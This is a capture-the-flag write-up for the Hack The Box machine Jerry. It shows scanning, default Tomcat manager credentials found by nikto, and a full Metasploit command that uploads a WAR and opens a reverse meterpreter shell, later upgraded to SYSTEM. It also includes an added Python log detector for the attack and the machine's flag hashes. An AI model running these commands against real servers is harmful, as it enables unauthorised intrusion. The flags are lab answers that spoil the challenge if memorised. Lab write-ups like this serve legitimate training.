About

Although Jerry is one of the easier machines on Hack The Box, it is realistic: Apache Tomcat is often found exposed and configured with common or weak credentials.

Enumeration

Running the portscan.sh script reveals a single attack vector: HTTP on port 8080.

┌──(m0nk3y@kali)-[~/HTB/Jerry]
└─$ sudo portscan.sh 10.129.136.9

┌──(m0nk3y@kali)-[~/HTB/Jerry]
└─$ cat PortScan\(10.129.136.9\)

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Exploitation

HTTP

Running nikto reveals that the target is hosting Apache Tomcat with a default manager credential of tomcat:s3cret.

┌──(m0nk3y@kali)-[~/HTB/Jerry]
└─$ nikto -host 10.129.136.9 -port 8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.129.136.9
+ Target Hostname:    10.129.136.9
+ Target Port:        8080
+ Start Time:         2023-10-17 03:34:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default account found for 'Tomcat Manager Application' at (ID 'tomcat', PW 's3cret'). Apache Tomcat. See: CWE-16
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected).
+ /manager/status: Tomcat Server Status interface found (pass protected).
+ 8205 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-10-17 04:00:04 (GMT-4) (1507 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

By executing the Metasploit module exploit/multi/http/tomcat_mgr_upload with the credential found, I’m able to gain a shell as the user JERRY$.

┌──(m0nk3y@kali)-[~/HTB/Jerry]
└─$ msfconsole -q -x 'use exploit/multi/http/tomcat_mgr_upload; set RHOSTS 10.129.136.9; set RPORT 8080; set HttpUsername tomcat; set HttpPassword s3cret; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
RHOSTS => 10.129.136.9
RPORT => 8080
HttpUsername => tomcat
HttpPassword => s3cret
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying vFmY9...
[*] Executing vFmY9...
[*] Sending stage (58829 bytes) to 10.129.136.9
[*] Undeploying vFmY9 ...
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.136.9:49192) at 2023-10-17 04:15:10 -0400

meterpreter > getuid
Server username: JERRY$
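
To turn the deploy, execute and undeploy steps shown above into something a defender can catch, here is an added example that is not part of the original write-up: a small Python detector that reads Tomcat access-log lines in the default AccessLogValve format and flags any client that deploys an application through the manager and undeploys it again within a short window. The log lines are constructed for the example; the upload and undeploy paths are Tomcat's own manager URLs.

```python
import re
from datetime import datetime

# Constructed sample lines in Tomcat's default AccessLogValve pattern (%h %l %u %t "%r" %s %b);
# they mirror the deploy / execute / undeploy sequence shown in the Metasploit output above.
SAMPLE_LOG = """\
10.10.16.9 - - [17/Oct/2023:04:15:04 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.9 - tomcat [17/Oct/2023:04:15:05 -0400] "GET /manager/html HTTP/1.1" 200 19876
10.10.16.9 - tomcat [17/Oct/2023:04:15:06 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=AB12 HTTP/1.1" 200 21016
10.10.16.9 - - [17/Oct/2023:04:15:08 -0400] "GET /vFmY9/ HTTP/1.1" 200 0
10.10.16.9 - tomcat [17/Oct/2023:04:15:12 -0400] "GET /manager/html/undeploy?path=/vFmY9&org.apache.catalina.filters.CSRF_NONCE=AB12 HTTP/1.1" 200 19800
10.10.14.23 - - [17/Oct/2023:04:20:00 -0400] "GET /examples/servlets/index.html HTTP/1.1" 200 1234
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# Deploy via the HTML manager form (POST .../upload) or the text interface (PUT .../deploy).
DEPLOY_RE = re.compile(r'^/manager/(html/upload|text/deploy)(\?|$)')
UNDEPLOY_RE = re.compile(r'^/manager/(html|text)/undeploy\?path=(?P<ctx>/[^&]*)')

def parse(line):
    """Split one access-log line into fields; return None if the line does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec

def detect_manager_abuse(log_text, window_s=300):
    """One finding per client that deployed an application through the manager and
    undeployed it again within window_s seconds (only 2xx responses count)."""
    last_deploy = {}  # client host -> timestamp of its most recent successful deploy
    findings = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or not 200 <= rec['status'] < 300:
            continue
        if DEPLOY_RE.match(rec['path']):
            last_deploy[rec['host']] = rec['ts']
        m = UNDEPLOY_RE.match(rec['path'])
        if m and rec['host'] in last_deploy:
            delta = (rec['ts'] - last_deploy[rec['host']]).total_seconds()
            if 0 <= delta <= window_s:
                findings.append({'host': rec['host'], 'user': rec['user'],
                                 'context': m.group('ctx'), 'seconds': delta})
    return findings

if __name__ == '__main__':
    for f in detect_manager_abuse(SAMPLE_LOG):
        print(f"{f['host']} deployed and removed {f['context']} within {f['seconds']:.0f}s")
```

Pointing this at the real access log (CATALINA_HOME/logs/localhost_access_log.*.txt by default) gives an after-the-fact check; the same rule translates directly into a SIEM correlation search.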

Since JERRY$ is the machine account, we already have complete access to the target; it is the java/meterpreter/reverse_tcp payload used by the exploit that makes the reported username confusing. By upgrading the session with the module post/multi/manage/shell_to_meterpreter, I’m able to gain a shell as the user NT AUTHORITY\SYSTEM.

meterpreter > run post/multi/manage/shell_to_meterpreter

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api, stdapi_sys_process_kill
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.16.9:4433
[*] Sending stage (200774 bytes) to 10.129.136.9
[*] Meterpreter session 2 opened (10.10.16.9:4433 -> 10.129.136.9:49193) at 2023-10-17 04:17:06 -0400
[*] Stopping exploit/multi/handler

meterpreter > sessions 2
[*] Backgrounding session 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

With the shell acquired, I’m able to read both flags from the file 2 for the price of 1.txt.

meterpreter > cat 'C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt'
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e